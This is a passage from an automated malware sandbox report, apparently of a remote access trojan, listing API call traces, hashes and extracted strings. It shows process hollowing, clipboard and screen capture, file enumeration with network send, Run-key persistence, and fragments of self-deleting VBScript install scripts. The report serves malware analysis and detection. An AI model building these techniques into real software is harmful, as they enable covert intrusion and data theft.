                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$AcquireRandomRelease
                            • String ID:
                            • API String ID: 1815803762-0
                            • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                            • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                            • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                            • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                            APIs
                            • OpenClipboard.USER32(00000000), ref: 0040A65D
                            • GetClipboardData.USER32(0000000D), ref: 0040A669
                            • CloseClipboard.USER32 ref: 0040A671
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseDataOpen
                            • String ID:
                            • API String ID: 2058664381-0
                            • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                            • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                            • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                            • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: FeaturePresentProcessor
                            • String ID:
                            • API String ID: 2325560087-3916222277
                            • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                            • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                            • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                            • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                            • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                            • Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                            • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: GetLocaleInfoEx
                            • API String ID: 2299586839-2904428671
                            • Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                            • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                            • Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                            • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstNextsend
                            • String ID:
                            • API String ID: 4113138495-0
                            • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                            • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                            • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                            • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$InfoLocale_abort
                            • String ID:
                            • API String ID: 1663032902-0
                            • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                            • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                            • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                            • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                            • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                            • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                            • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$InfoLocale_abort_free
                            • String ID:
                            • API String ID: 2692324296-0
                            • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                            • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                            • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                            • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                            • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                            • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                            • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                            APIs
                            • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                            • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                            • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                            • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                            APIs
                              • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                            • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                            • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                            • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                            • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                            • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                            • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                            • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                            APIs
                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                            • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                            • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                            • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                            • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                            • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                            • Instruction Fuzzy Hash:
                            APIs
                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                            • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                              • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                            • DeleteDC.GDI32(00000000), ref: 00416F32
                            • DeleteDC.GDI32(00000000), ref: 00416F35
                            • DeleteObject.GDI32(00000000), ref: 00416F38
                            • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                            • DeleteDC.GDI32(00000000), ref: 00416F6A
                            • DeleteDC.GDI32(00000000), ref: 00416F6D
                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                            • GetIconInfo.USER32(?,?), ref: 00416FC5
                            • DeleteObject.GDI32(?), ref: 00416FF4
                            • DeleteObject.GDI32(?), ref: 00417001
                            • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                            • DeleteDC.GDI32(?), ref: 0041713C
                            • DeleteDC.GDI32(00000000), ref: 0041713F
                            • DeleteObject.GDI32(00000000), ref: 00417142
                            • GlobalFree.KERNEL32(?), ref: 0041714D
                            • DeleteObject.GDI32(00000000), ref: 00417201
                            • GlobalFree.KERNEL32(?), ref: 00417208
                            • DeleteDC.GDI32(?), ref: 00417218
                            • DeleteDC.GDI32(00000000), ref: 00417223
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                            • String ID: DISPLAY
                            • API String ID: 479521175-865373369
                            • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                            • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                            • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                            • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                            • GetProcAddress.KERNEL32(00000000), ref: 00416477
                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                            • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                            • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                            • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                            • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                            • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                            • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                            • ResumeThread.KERNEL32(?), ref: 00416773
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                            • GetCurrentProcess.KERNEL32(?), ref: 00416795
                            • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                            • GetLastError.KERNEL32 ref: 004167B8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                            • API String ID: 4188446516-3035715614
                            • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                            • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                            • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                            • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                            APIs
                              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                            • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                              • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                              • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                            • ExitProcess.KERNEL32 ref: 0040C389
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                            • API String ID: 1861856835-1953526029
                            • Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                            • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                            • Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                            • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                            • ExitProcess.KERNEL32(00000000), ref: 00410F05
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                            • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                            • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                            • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                            • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                            • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                              • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                            • Sleep.KERNEL32(000001F4), ref: 004110E7
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                            • CloseHandle.KERNEL32(00000000), ref: 0041110E
                            • GetCurrentProcessId.KERNEL32 ref: 00411114
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                            • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                            • API String ID: 2649220323-71629269
                            • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                            • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                            • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                            • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                            APIs
                            • _wcslen.LIBCMT ref: 0040B882
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                            • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                            • _wcslen.LIBCMT ref: 0040B968
                            • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                            • _wcslen.LIBCMT ref: 0040BA25
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                            • ExitProcess.KERNEL32 ref: 0040BC36
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                            • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                            • API String ID: 2743683619-2376316431
                            • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                            • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                            • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                            • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                            APIs
